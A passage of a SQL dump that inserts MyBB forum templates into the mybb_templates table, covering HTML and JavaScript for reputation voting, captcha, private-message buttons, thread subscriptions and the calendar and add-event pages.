tabindex=\"999\">{$post[\'message\']}</textarea> </div> <div class=\"editor_control_bar\" style=\"width: 99%; padding: 4px; margin-top: 3px; text-align: right;\"> <input type=\"button\" class=\"button\" onclick=\"Thread.quickEditSave({$post[\'pid\']});\" value=\"{$lang->save_changes}\" tabindex=\"1000\" /> <input type=\"button\" class=\"button\" onclick=\"Thread.quickEditCancel({$post[\'pid\']});\" value=\"{$lang->cancel_edit}\" tabindex=\"1001\" /> </div> <br style=\"clear: both;\" /> </div>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('440', 'reputation_vote', '<tr> <td class=\"trow1 {$status_class}\"> {$reputation_vote[\'username\']} <span class=\"smalltext\">{$reputation_vote[\'user_reputation\']} - {$last_updated} {$delete_link}<br />{$postrep_given}<br /></span> <strong class=\"{$vote_type_class}\">{$vote_type} {$vote_reputation}:</strong> {$reputation_vote[\'comments\']} </td> </tr>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('441', 'reputation_addlink', '<div class=\"float_right\" style=\"padding-bottom: 4px;\"><a href=\"javascript:MyBB.reputation({$user[\'uid\']});\"><img src=\"{$theme[\'imglangdir\']}/rateuser.gif\" alt=\"{$lang->rate_user}\" title=\"{$lang->rate_user}\" /></a></div>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('442', 'member_profile_reputation', '<tr> <td class=\"{$bg_color}\"><strong>{$lang->reputation}</strong></td> <td class=\"{$bg_color}\">{$reputation} [<a href=\"reputation.php?uid={$memprofile[\'uid\']}\">{$lang->reputation_details}</a>] {$vote_link}</td> </tr>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('443', 'reputation_no_votes', '<tr> <td class=\"trow1\" style=\"text-align: center;\">{$lang->no_reputation_votes}</td> </tr>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('444', 'reputation_add_error', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->reputation}</title> {$headerinclude} </head> <body> <br /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"trow1\" style=\"padding: 20px\"> <strong>{$lang->error}</strong><br /><br /> <blockquote>{$message}</blockquote> <br /><br /> <div style=\"text-align: center;\"> <script type=\"text/javascript\"> <!-- var showBack = {$show_back}; if(showBack == 1) { document.write(\'[<a href=\"javascript:history.go(-1);\">{$lang->go_back}</a>]\'); } document.write(\'[<a href=\"javascript:window.close();\">{$lang->close_window}</a>]\'); // --> </script> </div> </td> </tr> </table> </body> </html>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('445', 'reputation_added', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->reputation}</title> {$headerinclude} </head> <body onunload=\"window.opener.location.reload();\"> <br /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"trow1\" style=\"padding: 20px\"> <strong>{$lang->vote_added}</strong><br /><br /> <blockquote>{$lang->vote_added_message}</blockquote> <br /><br /> <div style=\"text-align: center;\"> <script type=\"text/javascript\"> <!-- document.write(\'[<a href=\"javascript:window.close();\">{$lang->close_window}</a>]\'); // --> </script> </div> </td> </tr> </table> </body> </html>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('446', 'reputation_deleted', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->reputation}</title> {$headerinclude} </head> <body onunload=\"window.opener.location.reload();\"> <br /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"trow1\" style=\"padding: 20px\"> <strong>{$lang->vote_deleted}</strong><br /><br /> <blockquote>{$lang->vote_deleted_message}</blockquote> <br /><br /> <div style=\"text-align: center;\"> <script type=\"text/javascript\"> <!-- document.write(\'[<a href=\"javascript:window.close();\">{$lang->close_window}</a>]\'); // --> </script> </div> </td> </tr> </table> </body> </html>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('447', 'forumdisplay_thread_attachment_count', '<div style=\"float: right;\"><img src=\"{$theme[\'imgdir\']}/paperclip.gif\" alt=\"\" title=\"{$attachment_count}\" /></div>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('448', 'forumdisplay_rssdiscovery', '<link rel=\"alternate\" type=\"application/rss+xml\" title=\"{$lang->rss_discovery_forum} (RSS 2.0)\" href=\"{$mybb->settings[\'bburl\']}/syndication.php?fid={$fid}\" /> <link rel=\"alternate\" type=\"application/atom+xml\" title=\"{$lang->rss_discovery_forum} (Atom 1.0)\" href=\"{$mybb->settings[\'bburl\']}/syndication.php?type=atom1.0&amp;fid={$fid}\" />', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('449', 'post_captcha', '<tr id=\"captcha_trow\"> <td class=\"trow1\" valign=\"top\"><strong>{$lang->image_verification}</strong></td> <td class=\"trow1\"> <script type=\"text/javascript\" src=\"jscripts/captcha.js?ver=1400\"></script> <table style=\"width: 300px; padding: 4px;\"> <tr> <td rowspan=\"2\" style=\"vertical-align: middle;\"><img src=\"captcha.php?imagehash={$imagehash}\" alt=\"{$lang->image_verification}\" title=\"{$lang->image_verification}\" id=\"captcha_img\" /><br /><span style=\"color: red;\" class=\"smalltext\">{$lang->verification_subnote}</span> <script type=\"text/javascript\"> <!-- if(use_xmlhttprequest == \"1\") { document.write(\'<br \\/><br \\/><input type=\"button\" class=\"button\" name=\"refresh\" value=\"{$lang->refresh}\" onclick=\"return captcha.refresh();\" \\/>\'); } // --> </script> </td> <td><span class=\"smalltext\">{$lang->verification_note}</span></td> </tr> <tr> <td><input type=\"text\" class=\"textbox\" name=\"imagestring\" value=\"\" id=\"imagestring\" /><input type=\"hidden\" name=\"imagehash\" value=\"{$imagehash}\" id=\"imagehash\" /></td> </tr> </table> </td> </tr>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('450', 'post_captcha_recaptcha', '<tr id=\"captcha_trow\"> <td class=\"trow1\" valign=\"top\"><strong>{$lang->image_verification}</strong></td> <td class=\"trow1\"> <script type=\"text/javascript\"> <!-- var RecaptchaOptions = { theme: \'clean\' }; // --> </script> <table style=\"width: 300px; padding: 4px;\"> <tr> <td><span class=\"smalltext\">{$lang->verification_note}</span></td> </tr> <tr> <td><script type=\"text/javascript\" src=\"{$server}/challenge?k={$public_key}\"></script></td> </tr> </table> </td> </tr>', '-2', '1605', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('451', 'post_captcha_hidden', '<input type=\"hidden\" name=\"{$hash}\" value=\"{$field[\'hash\']}\" /> <input type=\"hidden\" name=\"{$string}\" value=\"{$field[\'string\']}\" />', '-2', '1605', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('452', 'newreply_multiquote_external', '<div id=\"multiquote_unloaded\"><span class=\"smalltext\">{$multiquote_text} <a href=\"./newreply.php?tid={$tid}\" onclick=\"return Post.loadMultiQuoted();\">{$multiquote_quote}</a>, <a href=\"javascript:Post.clearMultiQuoted();\">{$multiquote_deselect}</a></span></div>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('453', 'newthread_multiquote_external', '<div id=\"multiquote_unloaded\"><span class=\"smalltext\">{$multiquote_text} <a href=\"./newthread.php?fid={$fid}&amp;load_all_quotes=1\" onclick=\"return Post.loadMultiQuotedAll();\">{$multiquote_quote}</a>, <a href=\"javascript:Post.clearMultiQuoted();\">{$multiquote_deselect}</a></span></div>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('454', 'postbit_author_user', ' {$lang->postbit_posts} {$post[\'postnum\']}<br /> {$lang->postbit_joined} {$post[\'userregdate\']} {$post[\'replink\']}{$post[\'warninglevel\']}', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('455', 'postbit_author_guest', '&nbsp;', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('456', 'php_warnings', '<table border=\"0\" cellspacing=\"1\" cellpadding=\"4\" align=\"center\" class=\"tborder\"> <tr> <td class=\"tcat\"> <strong>{$lang->warnings}</strong> </td> </tr> <tr> <td class=\"trow1\"><span class=\"smalltext\">{$this->warnings}</span><br /></td> </tr> </table><br /><br />', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('457', 'postbit_delete_pm', '<a href=\"private.php?action=delete&amp;pmid={$id}&amp;my_post_key={$mybb->post_code}\"><img src=\"{$theme[\'imglangdir\']}/pm_delete.gif\" alt=\"{$lang->delete}\" title=\"{$lang->delete_title}\" /></a>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('458', 'postbit_forward_pm', '<a href=\"private.php?action=send&amp;pmid={$id}&amp;do=forward\"><img src=\"{$theme[\'imglangdir\']}/pm_forward.gif\" alt=\"{$lang->forward}\" title=\"{$lang->forward_title}\" /></a>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('459', 'postbit_reply_pm', '<a href=\"private.php?action=send&amp;pmid={$id}&amp;do=reply\"><img src=\"{$theme[\'imglangdir\']}/pm_reply.gif\" alt=\"{$lang->reply}\" title=\"{$lang->reply_title}\" /></a>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('460', 'postbit_replyall_pm', '<a href=\"private.php?action=send&amp;pmid={$id}&amp;do=replyall\"><img src=\"{$theme[\'imglangdir\']}/postbit_replyall.gif\" alt=\"{$lang->reply_to_all}\" title=\"{$lang->reply_title}\" /></a>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('461', 'showthread_search', ' <div class=\"float_right\"> <form action=\"search.php\" method=\"post\"> <input type=\"hidden\" name=\"action\" value=\"thread\" /> <input type=\"hidden\" name=\"tid\" value=\"{$thread[\'tid\']}\" /> <input type=\"text\" name=\"keywords\" value=\"{$lang->enter_keywords}\" onfocus=\"if(this.value == \'{$lang->enter_keywords}\') { this.value = \'\'; }\" onblur=\"if(this.value==\'\') { this.value=\'{$lang->enter_keywords}\'; }\" class=\"textbox\" size=\"25\" /> <input type=\"submit\" class=\"button\" value=\"{$lang->search_thread}\" /> </form> </div>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('462', 'postbit_ignored', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\" style=\"{$post_extra_style}\" id=\"ignored_post_{$post[\'pid\']}\"> <tr> <td class=\"{$altbg}\" width=\"15%\" valign=\"top\" style=\"white-space: nowrap; text-align: center;\"> <strong><span class=\"largetext\">{$post[\'profilelink\']}</span></strong> </td> <td class=\"{$altbg}\" width=\"85%\" style=\"vertical-align: middle;\"> <div style=\"float: right; width: auto; vertical-align: top; display: none;\" id=\"show_ignored_link_{$post[\'pid\']}\"><span class=\"smalltext\"><a href=\"#\" onclick=\"Thread.showIgnoredPost({$post[\'pid\']}); return false;\">{$lang->postbit_show_ignored_post}</a></span></div> <script type=\"text/javascript\"> <!-- $(\'show_ignored_link_{$post[\'pid\']}\').show(); // --> </script> <span class=\"smalltext\">{$ignored_message}</span> </td> </tr> </table>', '-2', '1410', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('463', 'footer_languageselect', '<form method=\"{$lang_redirect_url[\'form_method\']}\" action=\"{$lang_redirect_url[\'location\']}\" id=\"lang_select\"> {$lang_redirect_url[\'form_html\']} <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <select name=\"language\" onchange=\"MyBB.changeLanguage();\"> <optgroup label=\"{$lang->select_language}\"> {$lang_options} </optgroup> </select> {$gobutton} </form>', '-2', '1605', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('464', 'usercp_addsubscription_thread', '<html> <head> <title>{$lang->subscribe_to_thread}</title> {$headerinclude} </head> <body> {$header} <form action=\"usercp2.php\" method=\"post\" name=\"input\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <input type=\"hidden\" name=\"action\" value=\"do_addsubscription\" /> <input type=\"hidden\" name=\"tid\" value=\"{$thread[\'tid\']}\" /> <table width=\"100%\" border=\"0\" align=\"center\"> <tr> {$usercpnav} <td valign=\"top\"> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"2\"><strong>{$lang->subscribe_to_thread}</strong></td> </tr> <tr> <td class=\"trow1\" valign=\"top\" width=\"200\"><strong>{$lang->notification_method}</strong></td> <td class=\"trow1\" valign=\"top\"> <table width=\"100%\" border=\"0\" align=\"center\"> <tr> <td width=\"1\"><input type=\"radio\" name=\"notification\" id=\"notification_none\" value=\"0\" {$notification_none_checked} /></td> <td><strong><label for=\"notification_none\">{$lang->no_notification}</label></strong><br /><span class=\"smalltext\">{$lang->no_notification_desc}</span></td> </tr> <tr> <td width=\"1\"><input type=\"radio\" name=\"notification\" id=\"notification_instant\" value=\"1\" {$notification_instant_checked} /></td> <td><strong><label for=\"notification_instant\">{$lang->instant_notification}</label></strong><br /><span class=\"smalltext\">{$lang->instant_notification_desc}</span></td> </tr> </table> </td> </tr> </table> <br /> <div style=\"text-align: center;\"> <input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->do_subscribe}\" tabindex=\"3\" accesskey=\"s\" /> </div> </td> </tr> </table> </form> {$footer} </body> </html>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('465', 'post_subscription_method', '<tr> <td class=\"{$bgcolor}\" valign=\"top\">{$lang->thread_subscription_method}</td> <td class=\"{$bgcolor} smalltext\"> <label><input type=\"radio\" name=\"postoptions[subscriptionmethod]\" {$postoptions_subscriptionmethod_dont} value=\"\" style=\"vertical-align: middle;\" /> {$lang->no_subscribe}</label><br /> <label><input type=\"radio\" name=\"postoptions[subscriptionmethod]\" {$postoptions_subscriptionmethod_none} value=\"none\" style=\"vertical-align: middle;\" /> {$lang->no_email_subscribe}</label><br /> <label><input type=\"radio\" name=\"postoptions[subscriptionmethod]\" {$postoptions_subscriptionmethod_instant} value=\"instant\" style=\"vertical-align: middle;\" /> {$lang->instant_email_subscribe}</label><br /> </td> </tr>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('466', 'index_boardstats', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <thead> <tr> <td class=\"thead\"> <div class=\"expcolimage\"><img src=\"{$theme[\'imgdir\']}/collapse{$collapsedimg[\'boardstats\']}.gif\" id=\"boardstats_img\" class=\"expander\" alt=\"[-]\" title=\"[-]\" /></div> <div><strong>{$lang->boardstats}</strong></div> </td> </tr> </thead> <tbody style=\"{$collapsed[\'boardstats_e\']}\" id=\"boardstats_e\"> {$whosonline} {$birthdays} {$forumstats} <tr> <td class=\"tfoot\" style=\"text-align: right\"> <span class=\"smalltext\"> {$logoutlink} <a href=\"misc.php?action=markread{$post_code_string}\">{$lang->markread}</a> | <a href=\"showteam.php\">{$lang->forumteam}</a> | <a href=\"stats.php\">{$lang->forumstats}</a> </span> </td> </tr> </tbody> </table> <br />', '-2', '1603', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('467', 'calendar', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->calendar}</title> {$headerinclude} </head> <body> {$header} <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <thead> <tr> <td class=\"thead\" colspan=\"8\"> <div class=\"float_right\"> <a href=\"{$prev_link}\">&laquo; {$prev_month[\'name\']} {$prev_month[\'year\']}</a> | <a href=\"{$next_link}\">{$next_month[\'name\']} {$next_month[\'year\']} &raquo;</a> </div> <div><strong>{$monthnames[$month]} {$year}</strong></div> </td> </tr> <tr> <td class=\"tcat\">&nbsp;</td> {$weekday_headers} </tr> </thead> <tbody> {$calendar_rows} </tbody> </table> <br /> <form action=\"calendar.php\" method=\"post\"> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"trow1\"> <table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"> <tr> <td class=\"trow1\" valign=\"top\">{$addevent}</td> <td class=\"trow1\" align=\"right\"> <span class=\"smalltext\"><strong>{$lang->jump_month}</strong></span> <select name=\"month\"> <option value=\"{$month}\">{$monthnames[$month]}</option> <option value=\"{$month}\">----------</option> <option value=\"1\">{$lang->alt_month_1}</option> <option value=\"2\">{$lang->alt_month_2}</option> <option value=\"3\">{$lang->alt_month_3}</option> <option value=\"4\">{$lang->alt_month_4}</option> <option value=\"5\">{$lang->alt_month_5}</option> <option value=\"6\">{$lang->alt_month_6}</option> <option value=\"7\">{$lang->alt_month_7}</option> <option value=\"8\">{$lang->alt_month_8}</option> <option value=\"9\">{$lang->alt_month_9}</option> <option value=\"10\">{$lang->alt_month_10}</option> <option value=\"11\">{$lang->alt_month_11}</option> <option value=\"12\">{$lang->alt_month_12}</option> </select> <select name=\"year\"> <option value=\"{$year}\">{$year}</option> <option value=\"{$year}\">----------</option> {$yearsel} </select> {$gobutton} <br /><br /> <span class=\"smalltext\"><strong>{$lang->jump_to_calendar}</strong></span> {$calendar_jump} {$gobutton} </td> </tr> </table> </td> </tr> </table> </form> {$footer} </body> </html>', '-2', '1603', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('468', 'calendar_weekdayheader', ' <td class=\"tcat\" align=\"center\" width=\"14%\"><strong>{$weekday_name}</strong></td>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('469', 'calendar_weekrow', ' <tr> <td class=\"tcat\" align=\"center\" width=\"1\"><a href=\"{$week_link}\">&raquo;</a></td> {$day_bits} </tr>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('470', 'calendar_weekrow_day_today', ' <td class=\"calendar_daybit_today\"> <div class=\"float_right smalltext\"><a href=\"{$day_link}\">{$day}</a></div> <div> {$day_events} {$day_birthdays} </div> </td>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('471', 'calendar_weekrow_day', ' <td class=\"{$day_class}\" height=\"100\" valign=\"top\"> <div class=\"float_right smalltext\"><a href=\"{$day_link}\">{$day}</a></div> <div style=\"clear: both;\"> {$day_birthdays} {$day_events} </div> </td> ', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('472', 'calendar_weekrow_day_external', ' <td class=\"calendar_daybit_external\"> <div class=\"float_right smalltext\"><a href=\"{$day_link}\">{$day}</a></div> <div> {$day_events} {$day_birthdays} </div> </td> ', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('473', 'calendar_addevent', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->calendar} - {$lang->add_event}</title> {$headerinclude} </head> <body> {$header} {$event_errors} <form action=\"calendar.php\" method=\"post\" name=\"input\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\" style=\"clear: both;\"> <tr> <td colspan=\"2\" width=\"100%\" class=\"thead\"><strong>{$lang->add_event}</strong></td> </tr> <tr> <td width=\"20%\" class=\"trow1\"><strong>{$lang->event_name}</strong></td> <td class=\"trow1\"><input type=\"text\" class=\"textbox\" size=\"50\" name=\"name\" maxlength=\"120\" value=\"{$name}\"/></td> </tr> <tr> <td width=\"20%\" class=\"trow1\"><strong>{$lang->select_calendar}</strong></td> <td class=\"trow1\"> <select name=\"calendar\"> {$calendar_select} </select> </td> </tr> <tr> <td class=\"trow2\" style=\"vertical-align: top;\"><strong>{$lang->event_date}</strong></td> <td class=\"trow1\"> <script type=\"text/javascript\"> <!-- function toggleType() { if($(\'type_single\').checked == true) { Element.hide(\'ranged_selects\'); Element.show(\'single_selects\'); } else { Element.hide(\'single_selects\'); Element.show(\'ranged_selects\'); toggleRepeats(); } } function toggleRepeats() { var repeats = $(\'repeats\').options[$(\'repeats\').selectedIndex].value; $$(\'.repeats_type\').each(function(e) { Element.hide(e); }); if($(\'repeats_type_\'+repeats)) { Element.show(\'repeats_type_\'+repeats); } } // --> </script> <dl style=\"margin-top: 0; margin-bottom: 0; width: 100%;\"> <dt><input type=\"radio\" name=\"type\" value=\"single\" {$type_single} id=\"type_single\" onclick=\"toggleType();\" /> <label for=\"type_single\"><strong>{$lang->type_single}</strong></label></dt> <dd style=\"margin-top: 4px;\" id=\"single_selects\"> <select name=\"single_day\"> {$single_days} </select> &nbsp; <select name=\"single_month\"> <option value=\"1\"{$single_month[\'1\']}>{$lang->month_1}</option> <option value=\"2\"{$single_month[\'2\']}>{$lang->month_2}</option> <option value=\"3\"{$single_month[\'3\']}>{$lang->month_3}</option> <option value=\"4\"{$single_month[\'4\']}>{$lang->month_4}</option> <option value=\"5\"{$single_month[\'5\']}>{$lang->month_5}</option> <option value=\"6\"{$single_month[\'6\']}>{$lang->month_6}</option> <option value=\"7\"{$single_month[\'7\']}>{$lang->month_7}</option> <option value=\"8\"{$single_month[\'8\']}>{$lang->month_8}</option> <option value=\"9\"{$single_month[\'9\']}>{$lang->month_9}</option> <option value=\"10\"{$single_month[\'10\']}>{$lang->month_10}</option> <option value=\"11\"{$single_month[\'11\']}>{$lang->month_11}</option> <option value=\"12\"{$single_month[\'12\']}>{$lang->month_12}</option> </select> &nbsp; <select name=\"single_year\"> {$single_years} </select> </dd> <dt><input type=\"radio\" name=\"type\" value=\"ranged\" {$type_ranged} id=\"type_ranged\" onclick=\"toggleType();\" /> <label for=\"type_ranged\"><strong>{$lang->type_ranged}</strong></label></dt> <dd style=\"margin-top: 4px; width: 100%;\" id=\"ranged_selects\"> <table width=\"100%\"> <tr> <td class=\"smalltext\" style=\"padding: 4px; text-align: right;\">{$lang->start_time}</td> <td style=\"padding: 4px;\"> <select name=\"start_day\"> {$start_days} </select> <select name=\"start_month\"> <option value=\"1\"{$start_month[\'1\']}>{$lang->month_1}</option> <option value=\"2\"{$start_month[\'2\']}>{$lang->month_2}</option> <option value=\"3\"{$start_month[\'3\']}>{$lang->month_3}</option> <option value=\"4\"{$start_month[\'4\']}>{$lang->month_4}</option> <option value=\"5\"{$start_month[\'5\']}>{$lang->month_5}</option> <option value=\"6\"{$start_month[\'6\']}>{$lang->month_6}</option> <option value=\"7\"{$start_month[\'7\']}>{$lang->month_7}</option> <option value=\"8\"{$start_month[\'8\']}>{$lang->month_8}</option> <option value=\"9\"{$start_month[\'9\']}>{$lang->month_9}</option> <option value=\"10\"{$start_month[\'10\']}>{$lang->month_10}</option> <option value=\"11\"{$start_month[\'11\']}>{$lang->month_11}</option> <option value=\"12\"{$start_month[\'12\']}>{$lang->month_12}</option> </select> <select name=\"start_year\"> {$start_years} </select> <span class=\"smalltext\">&nbsp;&nbsp;&nbsp;{$lang->enter_time}</span> <input type=\"text\" class=\"textbox\" name=\"start_time\" value=\"{$start_time}\" size=\"7\" /> </td> </tr> <tr> <td class=\"smalltext\" style=\"padding: 4px; text-align: right;\">{$lang->end_time}</td> <td style=\"padding: 4px;\"> <select name=\"end_day\"> {$end_days} </select> <select name=\"end_month\"> <option value=\"1\"{$end_month[\'1\']}>{$lang->month_1}</option> <option value=\"2\"{$end_month[\'2\']}>{$lang->month_2}</option> <option value=\"3\"{$end_month[\'3\']}>{$lang->month_3}</option> <option value=\"4\"{$end_month[\'4\']}>{$lang->month_4}</option> <option value=\"5\"{$end_month[\'5\']}>{$lang->month_5}</option> <option value=\"6\"{$end_month[\'6\']}>{$lang->month_6}</option> <option value=\"7\"{$end_month[\'7\']}>{$lang->month_7}</option> <option value=\"8\"{$end_month[\'8\']}>{$lang->month_8}</option> <option value=\"9\"{$end_month[\'9\']}>{$lang->month_9}</option> <option value=\"10\"{$end_month[\'10\']}>{$lang->month_10}</option> <option value=\"11\"{$end_month[\'11\']}>{$lang->month_11}</option> <option value=\"12\"{$end_month[\'12\']}>{$lang->month_12}</option> </select> <select name=\"end_year\"> {$end_years} </select> <span class=\"smalltext\">&nbsp;&nbsp;&nbsp;{$lang->enter_time}</span> <input type=\"text\" class=\"textbox\" name=\"end_time\" value=\"{$end_time}\" size=\"7\" /> </td> </tr> <tr> <td class=\"smalltext\" style=\"padding: 4px; text-align: right; vertical-align: top;\">{$lang->time_zone}</td> <td style=\"padding: 4px;\"> {$timezones}<br /> <label class=\"smalltext\" style=\"display: block; padding-top: 4px;\"><input type=\"checkbox\" name=\"ignoretimezone\" value=\"1\" {$ignore_timezone} style=\"vertical-align: middle;\" /> {$lang->ignore_timezone} </label> </td> </tr> <tr> <td class=\"smalltext\" style=\"padding: 4px; text-align: right; vertical-align:top;\">{$lang->repeats}</td> <td class=\"smalltext\" style=\"padding: 4px;\"> <select name=\"repeats\" id=\"repeats\" onchange=\"toggleRepeats();\"> <option value=\"0\">{$lang->does_not_repeat}</option> <option value=\"1\"{$repeats_sel[1]}>{$lang->repeats_daily}</option> <option value=\"2\"{$repeats_sel[2]}>{$lang->repeats_weekdays}</option> <option value=\"3\"{$repeats_sel[3]}>{$lang->repeats_weekly}</option> <option value=\"4\"{$repeats_sel[4]}>{$lang->repeats_monthly}</option> <option value=\"5\"{$repeats_sel[5]}>{$lang->repeats_yearly}</option> </select> <div class=\"repeats_type\" id=\"repeats_type_1\" style=\"padding: 4px;\"> {$lang->repeats_every} <input type=\"text\" class=\"textbox\" name=\"repeats_1_days\" value=\"{$repeats_1_days}\" size=\"2\" /> {$lang->day_or_days} </div> <div class=\"repeats_type\" id=\"repeats_type_3\" style=\"padding: 4px;\"> {$lang->repeats_every} <input type=\"text\" class=\"textbox\" name=\"repeats_3_weeks\" value=\"{$repeats_3_weeks}\" size=\"2\" /> {$lang->week_or_weeks_on} <br /> <table style=\"padding: 4px;\"> <tr> <td style=\"padding: 2px;\" class=\"smalltext\"><label><input type=\"checkbox\" name=\"repeats_3_days[0]\" value=\"1\" {$repeats_3_days[0]} style=\"vertical-align: middle;\" /> {$lang->sunday}</label></td> <td style=\"padding: 2px;\" class=\"smalltext\"><label><input type=\"checkbox\" name=\"repeats_3_days[1]\" value=\"1\" {$repeats_3_days[1]} style=\"vertical-align: middle;\" /> {$lang->monday}</label></td> <td style=\"padding: 2px;\" class=\"smalltext\"><label><input type=\"checkbox\" name=\"repeats_3_days[2]\" value=\"1\" {$repeats_3_days[2]} style=\"vertical-align: middle;\" /> {$lang->tuesday}</label></td> <td style=\"padding: 2px;\" class=\"smalltext\"><label><input type=\"checkbox\" name=\"repeats_3_days[3]\" value=\"1\" {$repeats_3_days[3]} style=\"vertical-align: middle;\" /> {$lang->wednesday}</label></td> </tr> <tr> <td style=\"padding: 2px;\" class=\"smalltext\"><label><input type=\"checkbox\" name=\"repeats_3_days[4]\" value=\"1\" {$repeats_3_days[4]} style=\"vertical-align: middle;\" /> {$lang->thursday}</label></td> <td style=\"padding: 2px;\" class=\"smalltext\"><label><input type=\"checkbox\" name=\"repeats_3_days[5]\" value=\"1\" {$repeats_3_days[5]} style=\"vertical-align: middle;\" /> 